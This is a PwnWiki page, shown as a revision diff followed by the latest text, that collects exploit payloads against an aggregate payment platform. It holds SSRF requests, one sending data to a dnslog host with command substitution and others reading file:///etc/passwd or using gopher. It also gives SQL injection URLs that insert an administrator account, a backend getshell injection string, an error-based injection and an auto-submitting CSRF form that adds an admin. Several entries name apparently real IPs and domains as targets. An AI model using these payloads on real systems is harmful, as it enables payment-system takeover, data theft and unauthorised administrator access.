Difference between revisions of "全版本聚合支付漏洞"

From PwnWiki
 
(2 intermediate revisions by the same user not shown)
Line 1: Line 1:
 +
{| style="margin: auto; width: 750px;"
 +
| style="text-align: left; margin: 1em 1em 1em 0; border: 1px solid #20A3C0; padding: .2em;" |
 +
{| cellspacing="2px"
 +
| valign="middle" | [[Image:Warn1.png|50px]]
 +
| 這個頁面存在爭議,因此頁面內容存在不確定性。</span>
 +
|}
 +
|}
 +
<br><noinclude>
 +
 
==Vul==
 
==Vul==
 
+
<pre>
 
http://47.104.233.93/Payment_Index_batchQuery
 
http://47.104.233.93/Payment_Index_batchQuery
 
+
</pre>
 
==SSRF==
 
==SSRF==
 +
<pre>
 
http://api3.e-shion996.com/Payment_MGZF_PaymentQuery?data[orderid]=123&config[query_gateway]=http://o7xva.l.dnslog.io&config[mch_id]=123
 
http://api3.e-shion996.com/Payment_MGZF_PaymentQuery?data[orderid]=123&config[query_gateway]=http://o7xva.l.dnslog.io&config[mch_id]=123
 
o7xva.l.dnslog.io/`file`
 
o7xva.l.dnslog.io/`file`
Line 18: Line 28:
  
  
 
+
</pre>
  
 
==SQL注入添加管理員用戶==
 
==SQL注入添加管理員用戶==
 +
<pre>
 
index.php?m=Pay&c=Alipage&a=callbackurl&out_trade_no[0]=exp&out_trade_no[1]==20190722230646541015;insert%20into%20pay_admin%20(`id`,`username`,`password`,`groupid`)%20values%20(%27801%27,%27ok%27,%277aa5e695be95cdd64a88410a64dfe2c1%27,%271%27);--+
 
index.php?m=Pay&c=Alipage&a=callbackurl&out_trade_no[0]=exp&out_trade_no[1]==20190722230646541015;insert%20into%20pay_admin%20(`id`,`username`,`password`,`groupid`)%20values%20(%27801%27,%27ok%27,%277aa5e695be95cdd64a88410a64dfe2c1%27,%271%27);--+
 +
</pre>
  
  
  
 
+
==SQL注入(需要代理賬戶)==
==SQL注入(需要代理賬戶==
+
<pre>
 
 
 
index.php?m=user&c=IntoPieces&a=ajaxGetIndustry
 
index.php?m=user&c=IntoPieces&a=ajaxGetIndustry
 
DATA:
 
DATA:
Line 36: Line 47:
 
http://vip.qhkjpay.cn/conn.php
 
http://vip.qhkjpay.cn/conn.php
  
 
+
</pre>
 
 
  
  
 
==SQL注入(payload和上面相同)==
 
==SQL注入(payload和上面相同)==
 +
<pre>
 
index.php?m=user&c=api&a=ajaxGetIndustry
 
index.php?m=user&c=api&a=ajaxGetIndustry
 
+
</pre>
  
  
  
 
==后台Getshell==
 
==后台Getshell==
manage_System_base.html  
+
<pre>
 +
manage_System_base.html
 
',@copy($_REQUEST[x],$_REQUEST[c]),//
 
',@copy($_REQUEST[x],$_REQUEST[c]),//
 
+
</pre>
  
  
  
 
==SQL報錯注入(API支付)==
 
==SQL報錯注入(API支付)==
 +
<pre>
 
Pay_Pay_getSignkey?code=123*&merid=222
 
Pay_Pay_getSignkey?code=123*&merid=222
 
+
</pre>
 
 
 
 
  
 
==CSRF添加管理員==
 
==CSRF添加管理員==
<code>  
+
<pre>
<html lang="en"> <br>
+
<html lang="en">  
<body onload="document.forms[0].submit();"> <br>
+
<body onload="document.forms[0].submit();">  
<form id="form1" name="form1" action="http://127.0.0.1:93/index.php/luck_Admin_addAdmin.html" method="post"> <br>
+
<form id="form1" name="form1" action="http://127.0.0.1:93/index.php/luck_Admin_addAdmin.html" method="post">  
<input type="hidden" name="username" value="ok179"> <br>
+
<input type="hidden" name="username" value="ok179">  
<input type="hidden" name="password" value="test123"> <br>
+
<input type="hidden" name="password" value="test123">  
<input type="hidden" name="reppassword" value="test123"> <br>
+
<input type="hidden" name="reppassword" value="test123">  
<input type="hidden" name="groupid" value="1"> <br>
+
<input type="hidden" name="groupid" value="1">  
</body> <br>
+
</body>
</html>  
+
</html>
  
</code>
+
</pre>

Latest revision as of 19:47, 5 April 2021

Warn1.png 這個頁面存在爭議,因此頁面內容存在不確定性。


Vul

http://47.104.233.93/Payment_Index_batchQuery

SSRF

http://api3.e-shion996.com/Payment_MGZF_PaymentQuery?data[orderid]=123&config[query_gateway]=http://o7xva.l.dnslog.io&config[mch_id]=123
o7xva.l.dnslog.io/`file`




gopher://192.168.220.139:80/_POST%20/test/ssrf/post.php%20HTTP/1.1%250d%250aHost:%20192.168.220.139%250d%250aUser-Agent:%20curl/7.42.0%250d%250aAccept:%20*/*%250d%250aContent-Type:%20application/x-www-form-urlencoded%250d%250a%250d%250acmd=bbbbb




file:///etc/passwdhttp://example.com/ssrf.php?url=file:///C:/Windows/win.ini


SQL注入添加管理員用戶

index.php?m=Pay&c=Alipage&a=callbackurl&out_trade_no[0]=exp&out_trade_no[1]==20190722230646541015;insert%20into%20pay_admin%20(`id`,`username`,`password`,`groupid`)%20values%20(%27801%27,%27ok%27,%277aa5e695be95cdd64a88410a64dfe2c1%27,%271%27);--+


SQL注入(需要代理賬戶)

index.php?m=user&c=IntoPieces&a=ajaxGetIndustry
DATA:
id=123&name=_log ; insert%20into%20pay_admin%20(`id`,`username`,`password`,`groupid`)%20values%20(%27101%27,%27ok%27,%277aa5e695be95cdd64a88410a64dfe2c1%27,%271%27);--+

insert into pay_admin (`id`,`username`,`password`,`groupid`) values ('101','ok','7aa5e695be95cdd64a88410a64dfe2c1','1');--+

http://vip.qhkjpay.cn/conn.php


SQL注入(payload和上面相同)

index.php?m=user&c=api&a=ajaxGetIndustry


后台Getshell

manage_System_base.html
',@copy($_REQUEST[x],$_REQUEST[c]),//


SQL報錯注入(API支付)

Pay_Pay_getSignkey?code=123*&merid=222

CSRF添加管理員

<html lang="en"> 
<body onload="document.forms[0].submit();"> 
<form id="form1" name="form1" action="http://127.0.0.1:93/index.php/luck_Admin_addAdmin.html" method="post"> 
<input type="hidden" name="username" value="ok179"> 
<input type="hidden" name="password" value="test123"> 
<input type="hidden" name="reppassword" value="test123"> 
<input type="hidden" name="groupid" value="1"> 
</body>
</html>